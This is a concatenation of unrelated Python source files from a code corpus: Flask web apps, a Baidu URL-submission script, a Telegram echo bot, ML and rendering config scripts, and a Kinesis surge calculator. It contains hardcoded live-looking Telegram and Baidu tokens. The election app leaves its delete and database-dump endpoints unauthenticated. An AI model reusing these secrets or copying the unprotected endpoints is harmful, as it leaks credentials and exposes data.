goToEditPage():\n return app.send_static_file('edit.html'), 200\n\n@app.route('/edit/', methods=['GET'])\n@jwt_required()\ndef getElectionData(election_id):\n try:\n election = dbproxy.getElectionData(election_id, current_identity.id)\n except Exception as error:\n print(error.args)\n return error.args\n return json.dumps(election), 200\n\n@app.route('/edit/', methods=['PUT'])\n@jwt_required()\ndef editElection(election_id):\n data = request.get_json()\n try:\n dbproxy.updateElection(election_id, current_identity.id, data)\n except Exception as error:\n print(error.args)\n return error.args\n return 'Election updated', 200\n\n@app.route('/remove/', methods=['DELETE'])\ndef deleteElection(election_id):\n try:\n dbproxy.deleteElection(election_id)\n except Exception as error:\n print(error.args)\n return error.args\n return 'Deleted', 204\n\n@app.route('/debug')\ndef debugDB():\n return json.dumps(dbproxy.debug()), 200\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"386078983","text":"import numpy as np\nfrom flask import Flask, request, render_template\nimport pickle\n\napp = Flask(__name__)\nmodel = pickle.load(open('Classifier.model','rb'))\n\n@app.route('/')\ndef home():\n\treturn render_template('index.html')\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n\tform_features = [float(x) for x in request.form.values()]\n\tfinal_features = [np.array(form_features)]\n\tprediction = model.predict(final_features)\n\n\tif prediction[0] == 0:\n\t\treturn render_template('index.html', prediction_text = 'This Transaction Is A Genuine Transaction')\n\telse:\n\t\treturn render_template('index.html', prediction_text = 'This Transaction Is A Fraudulent Transaction')\n\nif __name__ == '__main__':\n\tapp.run(debug=True)","sub_path":"Flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140161537","text":"import subprocess\nimport json\nfrom datetime import datetime\nimport os\nimport pymysql\nimport requests\n\nconn = pymysql.connect(host = '*', \n database = 'baiduzz',\n user = '*', \n passwd = '*')\ncursor = conn.cursor()\n\nurlZhanZhang = '*'\n\nAPI = {'https://api.youqiantu.com/v1/social/groups/10000/threads'}#all apis\napiToUrlFormatMap = {'https://api.youqiantu.com/v1/social/groups/10000/threads':'https://www.youqiantu.com/threads/{tid}',\n }\n\ndef gainUrlFromDB():\n '''\n return a set containning the tid from the database\n '''\n cursor.execute('select url, commitTimes from urlInformation where ifCommitted = 1')\n result = cursor.fetchall()#result would like this : (('asdfa.com',), ('baidu.com',))\n urls = {res[0]:res[1] for res in result}\n return urls\n\nurlCommitted = gainUrlFromDB()#urls successfully committed from database\n\ndef gainUrlFailedFromDB():\n '''\n return a set containning the tid from the database\n '''\n cursor.execute('select url, commitTimes from urlInformation where ifCommitted = 0')\n result = cursor.fetchall()#result would like this : (('asdfa.com',), ('baidu.com',))\n urls = {res[0] :res[1] for res in result}\n return urls\n\nurlFailed = gainUrlFailedFromDB()\n\ndef gainUrlStatic(fileName):\n urls = set()\n try:\n with open(fileName, 'r+') as f:\n line = f.readline()\n line = line.strip('\\n')\n if bool(line):\n urlList = line.split('\\n')\n for index in range(len(urlList) ):\n if urlList[index] not in urlCommitted:#check if it is commited\n urls.add(urlList[index])\n return urls\n except FileNotFoundError:\n print(fileName + ' not found')\n\n\n\ndef gainTidbyApi(api):\n '''\n gain all tids by api\n api : \n return : set\n '''\n api_v1 = ['https://api.youqiantu.com/v1/social/groups/10000/threads']\n newTids = set()\n if api in api_v1:\n rowStart = 0\n rowNum = 16#number of each request\n newTids = set() #new tid\n while True:\n #repeat until hasMore == False is met\n apiFormat = api + '?rowStart={rowStart}&rowNum={rowNum}'\n urlOfApi = apiFormat.format(rowStart = rowStart, rowNum = rowNum)\n content = requests.get(urlOfApi).text#content from the url\n contentjson = json.loads(content)#convert to json format\n threads = contentjson['body']['threads'] #all threads\n if not hasattr(threads, '__iter__'):\n print('nothing from the sverver')\n break\n for item in threads:\n tid = item['tid']#an arctile's tid\n newTids.add(tid)\n \n if not contentjson['body']['hasMore']:#if hasMore is not True, the end is met\n break\n rowStart += rowNum\n #end while\n #end if\n\n return newTids\n\n\ndef gainUrlByApi(api):\n '''\n gain new urls from api\n api : string, api's url\n return : set\n '''\n newTids = gainTidbyApi(api)\n urls = set()#new urls ,there is no dumplicate, it's set\n urlFormat = apiToUrlFormatMap.get(api, '')\n if urlFormat:\n for tid in newTids:\n url = urlFormat.format(tid = tid)\n if url not in urlCommitted:\n urls.add(url)\n \n return urls\n\ndef commit(urls):\n '''\n urls : a set containning the url need to commit\n '''\n global urlCommitted, urlFailed\n\n timeNow = datetime.strftime(datetime.utcnow(), '%Y-%m-%d') \n urlFileName = 'urlCommitFile.txt'\n logFd = open(timeNow +'-log.json', 'a+', encoding = 'utf8')#store logs\n command = '''curl -H \"Content-Type:text/plain\" --data-binary @{urlFileName} \"http://data.zz.baidu.com/urls?site=www.youqiantu.com&token=FeSfg1UzQuOfrWBU\"'''.format(urlFileName = urlFileName)\n\n for url in urls:\n\n r = requests.post(urlZhanZhang, data = url)\n result = r.text#result from the commit\n resultJson = json.loads(result)#convert to json\n successNum = resultJson.get('success', 0)\n resultJson['time'] = timeNow\n resultJson['url'] = url\n \n logFd.write(str(resultJson))\n print('commit:' + url)\n\n ifCommitted = 0\n if successNum:#commit successful \n ifCommitted = 1\n urlCommitted[url] = 1#add url committed successfully \n \n firstCommitTime = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n if url in urlFailed:#we need update the lastCommitTime and committedTimes\n sql ='update urlInformation set lastCommitTime = \"{lastCommitTime}\", ifCommitted = {ifCommitted},commitTimes = {commitTimes},result = \"{result}\" where url = \"{url}\"'.format(\n url = url, ifCommitted = ifCommitted, lastCommitTime = firstCommitTime, commitTimes = urlFailed.get(url)+ 1, result = str(resultJson))\n else:\n sql = 'insert into urlInformation values (\"{url}\",{ifCommitted}, \"{firstCommitTime}\", \"{lastCommitTime}\", {commitTimes},\"{result}\")'.format(\n url = url, ifCommitted = ifCommitted, firstCommitTime = firstCommitTime, lastCommitTime = firstCommitTime, commitTimes = 1, result = str(resultJson))\n cursor.execute(sql)\n conn.commit()\n urlCommitted = gainUrlFromDB()#update url committed successfully from database\n urlFailed = gainUrlFailedFromDB()#update url committed failed from database\n #end for\n logFd.close()\n\n\ndef commitUrlFromApi():\n for api in API:\n urls = gainUrlByApi(api)\n commit(urls)\n\ndef commitUrlFromStatic():\n urlStatic = gainUrlStatic('rulStatic.txt')\n if urlStatic:\n commit(urlStatic)\n #print('commit from static')\n\ndef commitUrlFromFailed():\n urlFailed = gainUrlFailedFromDB()\n if urlFailed:\n commit(urlFailed)\n\n\ncommitUrlFromFailed()\ncommitUrlFromStatic()\ncommitUrlFromApi()","sub_path":"baidu_v1.py","file_name":"baidu_v1.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591555924","text":"import telebot\n\n\ntoken = '485606860:AAFC1eSP_LksyJSRHsDK0Z9b49Rt4u_YzEI'\n\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(content_types=['text'])\ndef check_message(message):\n\n t = message.text\n t=t[::-1]\n bot.send_message(message.chat.id, t)\n\nbot.polling(none_stop=True)\n","sub_path":"bot/this_bot.py","file_name":"this_bot.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405124460","text":"# Write a program that uses nested loops to collect data and calculate the average rainfall over a\r\n# period of years. The program should first ask for the number of years. The outer loop will\r\n# iterate once for each year. The inner loop will iterate twelve times, once for each month. Each\r\n# iteration of the inner loop will ask the user for the inches of rainfall for that month. After all\r\n# iterations, the program should display the number of months, the total inches of rainfall, and the\r\n# average rainfall per month for the entire period.\r\n\r\nyears = int(input('Enter number of years: '))\r\nmonth = 12\r\ntotal = 0\r\n\r\nfor yearNum in range(years):\r\n print('Year number ', yearNum + 1)\r\n for monthNum in range(month):\r\n print('Month ', monthNum + 1)\r\n rainfall = int(input('Rain fall: '))\r\n total += rainfall\r\n\r\ntotalMonth = years * 12\r\naverage = total / totalMonth\r\nprint(totalMonth, \" months\")\r\nprint(total, ' Inches of rainfall')\r\nprint('The average is ', average, ' inches.')","sub_path":"Pythonbasics/AverageRainfall.py","file_name":"AverageRainfall.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154475818","text":"from classification import run_classification_voting\r\nfrom constants import voting_param_grid\r\nimport pandas as pd\r\nimport joblib\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nif __name__ == \"__main__\":\r\n X_train = pd.read_pickle('data/X_train.pkl')\r\n y_train = pd.read_pickle('data/y_train.pkl')\r\n X_test = pd.read_pickle('data/X_test.pkl')\r\n y_test = pd.read_pickle('data/y_test.pkl')\r\n\r\n random_forest = joblib.load('models/best_model_random_forest.pkl')\r\n extra_trees = joblib.load('models/best_model_extra_trees.pkl')\r\n ada_boost = joblib.load('models/best_model_ada_boost.pkl')\r\n gradient_boosting = joblib.load('models/best_model_gradient_boosting.pkl')\r\n logistic_regression = joblib.load('models/best_model_logistic_regression.pkl')\r\n\r\n run_classification_voting(X_train, X_test, y_train, y_test, 'voting_classifier', voting_param_grid,\r\n random_forest, extra_trees, ada_boost, gradient_boosting, logistic_regression,\r\n 'accuracy', accuracy_score, predict_probas_or_classes='classes')\r\n","sub_path":"classifier_voting.py","file_name":"classifier_voting.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"504740854","text":"import random\r\nfrom pandas import json_normalize\r\nimport json\r\n\r\n\r\ndef randomColor(labels):\r\n colors = []\r\n for item in labels:\r\n colors.append(\"%06x\" % random.randint(0, 0xFFFFFF))\r\n return colors\r\n\r\n \r\n\r\ndef getChart(data):\r\n csv = json_normalize(data[0])\r\n x = data[1]\r\n y = data[2]\r\n record, labels = list(csv[x]) , list(set(csv[y]))\r\n xtype, ytype = csv.dtypes[x], csv.dtypes[y]\r\n colors = randomColor(labels)\r\n\r\n return {\r\n 'record' : record,\r\n 'colors' : colors,\r\n 'labels' : labels\r\n }\r\n ","sub_path":"modules/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243880959","text":"import os, os.path as op, sys, time\nimport pyperclip\nimport xml.etree.ElementTree as ET\nfrom shutil import copyfile\nfrom reconfigure_utils import inject_pycharm_config\n\nDATA = \"rocket_random_exr\"\nNAME = \"\" # postfix for dataset name\n\nRES = \"256x256\"\nPIXELS_PER_VIEW = '256'\nVIEW_PER_BATCH = '6' # not sure, but better to be an even divisor of PIXELS_PER_VIEW\nCHUNK_SIZE = '1' #'256' # > 1 to save memory to time\n\nLR = '0.0001' # 0.001\n\nCOLOR_WEIGHT = '1.0' #'256.0'\nALPHA_WEIGHT = '1e-3' #'1e-3'\n\n\nREDUCE_STEP_SIZE_AT = '7500,22500,60000'\nHALF_VOXEL_SIZE_AT = '7500,22500,60000'\nPRUNNING_EVERY_STEPS = '7500'\n\nPRUNNING_TH = '0.5' # '0.5'\nSAVE_INTERVAL_UPDATES = '2500'#'750' # '100'\nTOTAL_NUM_UPDATE = '200000' # 150000\nTRAIN_VIEWS = '0..150' # '0..100'\nVALID_VIEWS = '150..200' # '100..200\nNUM_WORKERS = '10' # '0'\n\n# VALID_VIEWS, REDUCE_STEP_SIZE_AT, HALF_VOXEL_SIZE_AT = '195..200', '100,200,300', '100,200,300'\n\nPREPROCESS = 'log' # none/mstd/minmax/log/nsvf(min_color==-1!)\nMIN_COLOR = '0.0' #\nMAX_COLOR = '0.8' # 0.8 - rocket/guitar/lego/hotdog; 5.0 - sphere; 0.3 - drums; 0.6 - lego-random\nGAMMA_CORRECTION = '2.0' # 2.0 - rocket/guitar/drums; 1.0 - sphere/lego; 1.5 - hotdog\nBG_COLOR = '0.0' # '0.25,0.25,0.25' # '1.0,1.0,1.0'\nSIGMA_NOISE = True\n# SIGMA_NOISE_LIGHT = False # not implemented yet\n\n\nTRACE_NORMAL = False\nLAMBERT_ONLY = False\nTASK = 'single_object_light_rendering'\n\n# # \n# ARCH = \"nsvf_base\"\n# TASK = 'single_object_rendering'\n# # \n\n# # \n# ARCH = \"mlnrf_base\"\n# # EMBL_L = '10' # !! Both EMBL_V & EMBL_L should be set in order to have effect !!\n# # EMBL_V = '10'\n# # \n\n# # \n# ARCH = \"mlnrfnrf_base\"\n# PREDICT_L = True\n# # LIGHT_INTENSITY = '1000.0' # sphere_exr -> 1k Watt\n# # LIGHT_INTENSITY = '500.0' # rocket_exr -> 5k Watt\n# # LIGHT_INTENSITY = '300.0' # guitar_exr -> 0.5k Watt\n# LIGHT_INTENSITY = '400.0'#'300.0' # lego -> 0.7k Watt\n# # LIGHT_INTENSITY = '1000.0' # drums -> 1k Watt\n# # LIGHT_INTENSITY = '500.0' # hotdog -> 0.7k Watt\n# TEXTURE_LAYERS = '5'\n# # \n\n# \nARCH = \"mlnrfexva_base\"\nPREDICT_L = True\nVOXEL_SIGMA = 0.5\n# LIGHT_INTENSITY = '1000.0' # sphere_exr -> 1k Watt\nLIGHT_INTENSITY = '5.0' # 500 excol; rocket_exr -> 5k Watt\n# LIGHT_INTENSITY = '350.0' # tablelamp_exr -> 0.5k Watt\n# LIGHT_INTENSITY = '50.0' # guitar_exr -> 0.5k Watt\n# LIGHT_INTENSITY = '40.0' # lego -> 0.7k Watt\n# LIGHT_INTENSITY = '50.0' # hotdog -> 0.7k Watt\nTEXTURE_LAYERS = '5'\n# \n\n# # \n# ARCH = \"mlnrfexbf_base\"\n# PREDICT_L = True\n# # LIGHT_INTENSITY = '1000.0' # sphere_exr -> 1k Watt\n# # LIGHT_INTENSITY = '500.0' # rocket_exr -> 5k Watt\n# # LIGHT_INTENSITY = '350.0' # tablelamp_exr -> 0.5k Watt\n# # LIGHT_INTENSITY = '200.0' # guitar_exr -> 0.5k Watt\n# LIGHT_INTENSITY = '20.0' # lego -> 0.7k Watt\n# # LIGHT_INTENSITY = '300.0' # hotdog -> 0.7k Watt\n# TEXTURE_LAYERS = '5'\n# # \n\n\n\nHDRFLIP = True\nLPIPS = True\n\nSUFFIX = \"v1\"\nDATASET = \"datasets/\" + DATA # \"data/Synthetic_NeRF/\" + DATA\nSAVE = \"checkpoint/\" + DATA + (('_' + NAME) if NAME else '')\n# SAVE = \"checkpoint/rocket_random_exr_test4\"\nMODEL = ARCH + SUFFIX\nVOXEL_NUM = '64' # '512' # mutually exclusive with VOXEL_SIZE = 0.27057\n#TODO: VOXEL_NUM & VOXEL_SIZE might not work as intended!\n\n\nUSE_OCTREE = True\n# USE_CPU = False # WARNING: does not work on CPU\n# SCENE_SCALE = '1.0'\n\nCOPY2CLIPBOARD = False # after running the script the configuration is inserted into clipboard\nINJECT_PYCHARM = True\nSAVE_FILE = True\nXML_PATH = '.run/train.run.xml'\nNUM_BACKUPS = 10\n\n\n# create directory if doesn't exist\n# if not os.path.exists(SAVE + '/' + MODEL): os.makedirs(SAVE + '/' + MODEL)\n\n# create configuration file\nparameters = DATASET\nif 'LIGHT_INTENSITY' in locals():\n\tparameters += '\\n--light-intensity ' + LIGHT_INTENSITY\n# parameters += '\\n--scene-scale ' + SCENE_SCALE\nparameters += '\\n--view-resolution ' + RES\nparameters += '\\n--valid-view-resolution ' + RES\nparameters += '\\n--view-per-batch ' + VIEW_PER_BATCH\nparameters += '\\n--valid-view-per-batch ' + VIEW_PER_BATCH\nparameters += '\\n--pixel-per-view ' + PIXELS_PER_VIEW\nparameters += '\\n--chunk-size ' + CHUNK_SIZE\nparameters += '\\n--valid-chunk-size ' + CHUNK_SIZE\nparameters += '\\n--lr ' + LR\nparameters += '\\n--color-weight ' + COLOR_WEIGHT\nparameters += '\\n--alpha-weight ' + ALPHA_WEIGHT\nparameters += '\\n--train-views \"' + TRAIN_VIEWS + '\"'\nparameters += '\\n--valid-views \"' + VALID_VIEWS + '\"'\nparameters += '\\n--half-voxel-size-at \"' + HALF_VOXEL_SIZE_AT + '\"'\nparameters += '\\n--reduce-step-size-at \"' + REDUCE_STEP_SIZE_AT + '\"'\nparameters += '\\n--pruning-every-steps ' + PRUNNING_EVERY_STEPS\nparameters += '\\n--save-interval-updates ' + SAVE_INTERVAL_UPDATES\nif 'VOXEL_SIGMA' in locals():\n\tparameters += '\\n--voxel-sigma ' + str(VOXEL_SIGMA)\nif 'PREPROCESS' in locals():\n\tparameters += '\\n--preprocess ' + PREPROCESS\nparameters += '\\n--min-color ' + MIN_COLOR\nparameters += '\\n--max-color ' + MAX_COLOR\nif 'GAMMA_CORRECTION' in locals():\n\tparameters += '\\n--gamma-correction ' + GAMMA_CORRECTION\nparameters += '\\n--total-num-update ' + TOTAL_NUM_UPDATE\nparameters += '\\n--max-update ' + TOTAL_NUM_UPDATE\nparameters += '\\n--user-dir fairnr'\n# parameters += '\\n--background-stop-gradient'\nparameters += '\\n--task ' + TASK\nparameters += '\\n--max-sentences 1'\nparameters += '\\n--no-preload'\nparameters += '\\n--sampling-on-mask 1.0'\nparameters += '\\n--no-sampling-at-reader'\nif 'SIGMA_NOISE' in locals() and SIGMA_NOISE:\n\tparameters += '\\n--discrete-regularization'\nif 'SIGMA_NOISE_LIGHT' in locals() and SIGMA_NOISE_LIGHT:\n\tparameters += '\\n--discrete-regularization-light'\nif 'HDRFLIP' in locals() and HDRFLIP:\n\tparameters += '\\n--eval-hdrflip'\nif 'LPIPS' in locals() and LPIPS:\n\tparameters += '\\n--eval-lpips'\nif 'COMPOSITE_R' in locals() and COMPOSITE_R:\n\tparameters += '\\n--composite-r'\nif 'VOXEL_NUM' in locals():\n\tparameters += '\\n--voxel-num ' + locals()['VOXEL_NUM']\nelif 'VOXEL_SIZE' in locals():\n\tparameters += '\\n--voxel-size ' + locals()['VOXEL_SIZE']\nif 'TRACE_NORMAL' in locals() and TRACE_NORMAL:\n\tparameters += '\\n--trace-normal'\nif 'LAMBERT_ONLY' in locals() and LAMBERT_ONLY:\n\tparameters += '\\n--lambert-only'\nif 'PREDICT_L' in locals() and PREDICT_L:\n\tparameters += '\\n--predict-l'\nparameters += '\\n--transparent-background \"' + BG_COLOR + '\"'\n# parameters += '\\n--no-background-loss'\nparameters += '\\n--background-stop-gradient'\nparameters += '\\n--arch ' + ARCH\nparameters += '\\n--initial-boundingbox ' + DATASET + '/bbox.txt'\nparameters += '\\n--raymarching-stepsize-ratio 0.125'\nif USE_OCTREE:\n\tparameters += '\\n--use-octree'\nif 'TEXTURE_LAYERS' in locals():\n\tparameters += '\\n--texture-layers ' + TEXTURE_LAYERS\nif 'EMBL_L' in locals() and 'EMBL_V' in locals():\n\tparameters += '\\n--inputs-to-texture feat:0:256,ray:'+EMBL_V+',light:'+EMBL_L+',lightd:0:1'\n# if USE_CPU:\n# \tparameters += '\\n--cpu'\nparameters += '\\n--optimizer \"adam\"'\nparameters += '\\n--adam-betas \"(0.9, 0.999)\"'\nparameters += '\\n--lr-scheduler \"polynomial_decay\"'\nparameters += '\\n--end-learning-rate ' + str(float(LR) * 1e-2)\nparameters += '\\n--clip-norm 0.0' # 0.01\nparameters += '\\n--criterion \"srn_loss\"'\nparameters += '\\n--num-workers ' + NUM_WORKERS\nparameters += '\\n--seed 2'\nparameters += '\\n--virtual-epoch-steps 5000'\nparameters += '\\n--save-interval 1'\nif 'PRUNNING_TH' in locals():\n\tparameters += '\\n--pruning-th ' + PRUNNING_TH\n# '--rendering-every-steps'\nparameters += '\\n--keep-interval-updates 5'\nparameters += '\\n--log-format simple'\nparameters += '\\n--log-interval 1'\nparameters += '\\n--tensorboard-logdir ' + SAVE + '/tensorboard/' + MODEL\nparameters += '\\n--save-dir ' + SAVE + '/' + MODEL\n\nif SAVE_FILE:\n\twith open('configuration.txt', 'w') as f:\n\t\t# f.write(parameters)\n\t\tf.write(parameters.replace('\\n', ' '))\n\nif COPY2CLIPBOARD:\n\tpyperclip.copy(parameters)\n\nif INJECT_PYCHARM:\n\tinject_pycharm_config('train', XML_PATH, parameters, NUM_BACKUPS)\n\n# # \n# ARCH = \"mlnrfex_base\"\n# TRACE_NORMAL = True\n# LAMBERT_ONLY = False\n# TEXTURE_LAYERS = '4'\n# LIGHT_INTENSITY = '1000.0'\n# # \n\n# # \n# ARCH = \"mlnrfiva_base\"\n# VOXEL_SIGMA = 0.8\n# # ","sub_path":"util/reconfigure_train.py","file_name":"reconfigure_train.py","file_ext":"py","file_size_in_byte":8834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99999972","text":"import re, subprocess\nfrom datetime import datetime\n\nimport glob, gzip, sys, os, time\n\ndef getInterfaceTotals():\n# DEVNULL = open(os.devnull, 'w')\n# command = \"ifconfig \" + interface, \"r\"\n# process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=DEVNULL, shell=True)\n f = open('ifconfig_output.txt',\"r\")\n result=f.read()\n f.close()\n print(result)\n\n r_ipconfig = re.compile(r\"RX bytes:(\\d+) .+ TX bytes:(\\d+)\")\n for line in result.split('\\n'):\n print('line is:',line)\n m_ipconfig = r_ipconfig.search(line)\n print('m_ipconfig:',m_ipconfig)\n if m_ipconfig:\n print(int(m_ipconfig.group(1)),int(m_ipconfig.group(2)))\n return(int(m_ipconfig.group(2)), int(m_ipconfig.group(1)))\n return (0, 0)\n\nmyName=\"\"\n#print('What is your name?') # ask for their name\nmyName = input(\"What is your name? \")\n# or just: myName = input('What is your name?')\nprint('It is good to meet you, ' + myName)\n\n#result = getInterfaceTotals()\n# print(result)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"121676123","text":"from dbconnectprgm.dbconnect import *\ndb=get_connection()\ncursor=db.cursor()\n\nsql=\"select * from faculty\"\ntry:\n cursor.execute(sql)\n queryset=cursor.fetchall()\n # (100,ajay,ddatastructure) (101,vijay,csa)\n for faculty in queryset:\n print(\"id=\",faculty[0])\n print(\"name \",faculty[1])\n\nexcept Exception as e:\n print(e.args)\n\nfinally:\n db.close()","sub_path":"python to database connection/fetchdata.py","file_name":"fetchdata.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641220430","text":"# -*- coding:utf-8 -*-\r\n# Author: washing\r\n# DateTime: 2021/6/17 10:34\r\n# File: 0065.py\r\n# Desc: \r\n\r\nclass Solution:\r\n def isNumber(self, s: str) -> bool:\r\n if s == 'e' or 'f' in s: return False\r\n try:\r\n float(s)\r\n return True\r\n except: return False\r\n","sub_path":"Solutions/0065/0065.py","file_name":"0065.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"584582073","text":"import sys,time\nimport geohash\nimport json\nimport boto3\nimport copy\nimport math\nimport logging\nimport psycopg2\nfrom decimal import *\nfrom datetime import datetime, timedelta\n\nconf_file = open(\"/home/ec2-user/.conf/db_config.json\",\"r\")\nconf = json.loads(conf_file.read())\nconf_file.close()\n\nrds_client = psycopg2.connect(database=conf[\"db\"], user = conf[\"user\"],\\\n password = conf[\"password\"], host = conf[\"host\"], port = conf[\"port\"])\nkinesis_client = boto3.client(\"kinesis\")\nlogger = None\n\ndef populateCount(geo_dict,rec_list,end_time):\n for rec in rec_list:\n data = json.loads(rec[\"Data\"])\n ts = datetime.strptime(data[\"ts\"],\"%Y-%m-%d %H:%M:%S\")\n if ts > end_time: return False\n geo_dict[data[\"hash\"]] = geo_dict[data[\"hash\"]]+1 if data[\"hash\"] in geo_dict else 1\n return True\n\ndef fetchAndAggregateRecords(queue_name,start_time,end_time):\n stream_info = kinesis_client.describe_stream(StreamName=queue_name)\n shard_id = stream_info[\"StreamDescription\"][\"Shards\"][0][\"ShardId\"]\n logger.info(\"shard_id:{} \".format(shard_id))\n\n shard_itr = kinesis_client.get_shard_iterator(\n StreamName=queue_name,\n ShardId=shard_id,\n ShardIteratorType=\"AT_TIMESTAMP\",\n Timestamp=start_time\n )\n shard_itr_cd = shard_itr[\"ShardIterator\"]\n resp = kinesis_client.get_records(ShardIterator=shard_itr_cd, Limit=100)\n\n geo_dict = {}\n if not populateCount(geo_dict,resp[\"Records\"],end_time):return geo_dict\n\n total_rec_cnt = len(resp[\"Records\"])\n while resp[\"NextShardIterator\"] is not None:\n shard_itr_cd = resp[\"NextShardIterator\"]\n time.sleep(0.5)\n resp = kinesis_client.get_records(ShardIterator=shard_itr_cd,Limit=100)\n\n rec_cnt = len(resp[\"Records\"])\n if rec_cnt==0:return geo_dict\n else: total_rec_cnt+=rec_cnt\n logger.info(\"Total records fetched:{}\".format(total_rec_cnt))\n\n if not populateCount(geo_dict,resp[\"Records\"],end_time):return geo_dict\n\n return geo_dict\n\ndef surge(demand,supply,max_surge):\n coeff = 1-max_surge\n x = float(demand)/float(supply)\n return max_surge + coeff * math.exp((1-x)/2)\n\ndef computeAreawiseSurge(geo_demand,geo_supply,max_surge):\n surge_dict = {}\n area_list = list(set(geo_demand.keys()+geo_supply.keys()))\n for area_hash in area_list:\n if area_hash not in geo_supply:\n surge_dict[area_hash] = max_surge\n elif area_hash not in geo_demand:\n surge_dict[area_hash] = 0\n else:\n surge_dict[area_hash] = surge(geo_demand[area_hash],geo_supply[area_hash],max_surge)\n return surge_dict\n\ndef updateSurgeTable(geo_surge,geo_demand,geo_supply):\n surge_table = \"public.data_service_regionsurge\"\n\n logger.info(\"Truncating the table...\")\n cur = rds_client.cursor()\n cur.execute(\"TRUNCATE {};\".format(surge_table))\n rds_client.commit()\n logger.info(\"Table truncated successfully.\")\n\n logger.info(\"Inserting the records into the table...\")\n ctr = 0\n for area_hash in geo_surge:\n supply = geo_supply[area_hash] if area_hash in geo_supply else 0\n demand = geo_demand[area_hash] if area_hash in geo_demand else 0\n cur.execute(\"INSERT INTO {} (geo_hash,demand,supply,surge) VALUES ('{}',\\\n {},{},{})\".format(surge_table,area_hash, demand, supply, geo_surge[area_hash]))\n ctr += 1\n if ctr%50==0:\n rds_client.commit()\n logger.info(\"Total records inserted:{}\".format(ctr))\n rds_client.commit()\n\nif __name__ == \"__main__\":\n total_params = 5\n params_given = len(sys.argv)\n if params_given != total_params+1:\n print(\"Missing arguments. Required {} given {}\".format(total_params,params_given))\n sys.exit(2)\n\n demand_queue = sys.argv[1]\n supply_queue = sys.argv[2]\n agg_interval = int(sys.argv[3])\n max_surge = int(sys.argv[4])\n log_file = sys.argv[5]\n\n logging.basicConfig(filename=log_file,format='%(asctime)s - %(levelname)s - %(message)s',level=logging.INFO)\n logger=logging.getLogger(__name__)\n\n end_time = datetime.now()\n start_time = end_time - timedelta(minutes=agg_interval)\n\n logger.info(\"Fetching demand records...\")\n geo_demand = fetchAndAggregateRecords(demand_queue,start_time,end_time)\n logger.info(\"Total {} demand records fetched for {} geo_areas\".format(sum(geo_demand.values()),len(geo_demand)))\n\n logger.info(\"Fetching supply records...\")\n geo_supply = fetchAndAggregateRecords(supply_queue,start_time,end_time)\n logger.info(\"Total {} supply records fetched for {} geo_areas\".format(sum(geo_supply.values()),len(geo_supply)))\n\n logger.info(\"Calculating surge for the areas...\")\n geo_surge = computeAreawiseSurge(geo_demand,geo_supply,max_surge)\n logger.info(\"Surge calculation complete.\")\n\n logger.info(\"Updating the surge table with {} records...\".format(len(geo_surge)))\n updateSurgeTable(geo_surge,geo_demand,geo_supply)\n logger.info(\"Surge table updated successfully.\")\n\n logger.info(\"================================\\n\")\n","sub_path":"kinesis/surge/demand_supply_aggregator.py","file_name":"demand_supply_aggregator.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"475153176","text":"if __name__ == \"__main__\":\n n,m = [int(x) for x in input().strip().split()]\n image = [input() for i in range(n)]\n\n res = 0\n for i in range(n-1):\n for j in range(m-1):\n s = image[i][j] + image[i][j+1] + image[i+1][j] + image[i+1][j+1]\n #print(\"\".join(sorted(s)))\n if \"\".join(sorted(s)) == \"acef\":\n res += 1\n print(res)\n","sub_path":"150607-Looksery-Cup-2015/549A-Face-Detection.py","file_name":"549A-Face-Detection.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546324027","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2021 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Parameters feeder module.\"\"\"\nimport os\nfrom typing import Any, Dict, List, Optional\n\nfrom neural_compressor.experimental.metric.metric import framework_metrics\nfrom neural_compressor.objective import OBJECTIVES\nfrom neural_compressor.strategy import STRATEGIES\nfrom neural_compressor.ux.components.model.repository import ModelRepository\nfrom neural_compressor.ux.utils.exceptions import ClientErrorException\nfrom neural_compressor.ux.utils.utils import (\n check_module,\n filter_transforms,\n load_dataloader_config,\n 